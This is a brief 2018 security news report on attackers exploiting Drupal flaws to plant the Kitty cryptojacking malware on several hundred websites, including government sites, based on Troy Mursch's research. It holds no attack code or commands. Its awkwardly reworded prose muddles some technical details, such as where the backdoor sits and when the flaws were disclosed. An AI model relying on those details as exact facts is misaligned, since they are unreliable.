Drupal Flaws Exploited for Hosting Crypto-Jacking Malware Kitty

One series of security flaws with high-severity nature affecting Drupal were revealed April 2018 which are currently being exploited in widespread assaults through certain malware scheme. Troy Mursch security researcher at Bad Packets Report recently identified a few hundred hijacked Drupal websites that were getting utilized for harboring 'crypto-jacking' malware which typically consumes CPUs of infected systems for mining digital currency through CoinHive.

Mursch minutely examined a particular domain name to which each of the contaminated websites pointed and then discovered that the electronic mail id utilized connected to some different domain registrations. The researcher scanned over 100,000 websites and found that 348 of them were infected. Arnnet.com posted this, May 9, 2018.

Hackers by exploiting the flaw can launch more than one attack vector for wholly hijacking Drupal websites. Subsequently, crypto-mining codes can be embedded or data stolen else even websites shut down. Cyber-criminals misuse the flaw to get an entry point for deploying the Kitty malicious program and then fix it onto setup files of Drupal. Notably, Kitty malicious program utilizes "Webminerpool" a type of mining software of open source kind that's created for Web-browsers.

Soon as the websites are contaminated, the Drupal flaw gets activated, letting the attacker place certain backdoor onto victims' computer. The malicious program's crafting is in a way that one job scheduler, which's time-based, runs the code after every 1 minute, leading to continuously happening infections. The trait as well lets attackers thrust updates for Kitty.

The affected websites of maximum number get their hosting from Amazon while have their locations in USA. Mursch confidently thinks those websites were hijacked via one obsolete Drupal version. Websites belonging to governments inside Mexico, USA, South Africa, Peru, Italy and Turkey too have been impacted.

Security investigators contend the attackers are extremely organized since Kitty's initial edition was 1.5 following which the latest is 1.6. Cyber-criminals update their malicious wares by appending fresh traits that makes their attacks more robust.

Meanwhile, ever-since Drupal alerted during March about more than 1m websites running Drupal getting affected with the flaw, a number of botnets, exploits as well as crypto-mining malware thereafter emerged.

» SPAMfighter News - 5/16/2018